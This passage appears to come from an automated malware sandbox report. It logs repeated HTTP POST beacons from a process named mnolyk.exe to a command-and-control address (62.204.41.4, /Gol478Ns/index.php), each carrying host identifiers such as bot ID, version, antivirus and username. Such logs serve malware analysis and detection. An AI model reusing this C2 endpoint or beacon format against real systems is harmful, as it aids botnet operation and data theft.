                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      143 | 192.168.2.7 | 49838 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:39.576742887 CET | 258 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:39.640382051 CET | 258 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      144 | 192.168.2.7 | 49839 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:39.819277048 CET | 259 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:39.882565975 CET | 259 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      145 | 192.168.2.7 | 49840 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:40.053783894 CET | 260 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:40.117824078 CET | 260 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      146 | 192.168.2.7 | 49841 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:40.291176081 CET | 261 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:40.353945017 CET | 261 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      147 | 192.168.2.7 | 49842 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:40.535002947 CET | 262 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:40.598506927 CET | 262 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      148 | 192.168.2.7 | 49843 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:40.769583941 CET | 263 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:40.833797932 CET | 263 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      149 | 192.168.2.7 | 49844 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:41.013550043 CET | 264 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:41.078934908 CET | 264 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      15 | 192.168.2.7 | 49709 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:05.205403090 CET | 119 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:05.269750118 CET | 119 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      150 | 192.168.2.7 | 49845 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:41.253266096 CET | 265 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:41.315891981 CET | 265 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      151 | 192.168.2.7 | 49846 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:41.490813017 CET | 266 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:41.555815935 CET | 266 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      152 | 192.168.2.7 | 49847 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:41.745093107 CET | 267 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:41.808494091 CET | 267 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      153 | 192.168.2.7 | 49848 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:41.988753080 CET | 268 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:42.053529978 CET | 268 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      154 | 192.168.2.7 | 49849 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:42.221379995 CET | 269 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:42.285451889 CET | 269 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      155 | 192.168.2.7 | 49850 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:42.466685057 CET | 270 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:42.530186892 CET | 270 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      156 | 192.168.2.7 | 49851 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:42.712678909 CET | 271 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:42.774888039 CET | 271 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      157 | 192.168.2.7 | 49852 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:42.945715904 CET | 272 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:43.009648085 CET | 272 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      158 | 192.168.2.7 | 49853 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:43.194714069 CET | 273 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:43.259275913 CET | 273 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      159 | 192.168.2.7 | 49854 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:43.442984104 CET | 274 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:43.506808996 CET | 274 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      16 | 192.168.2.7 | 49710 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:05.446085930 CET | 120 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
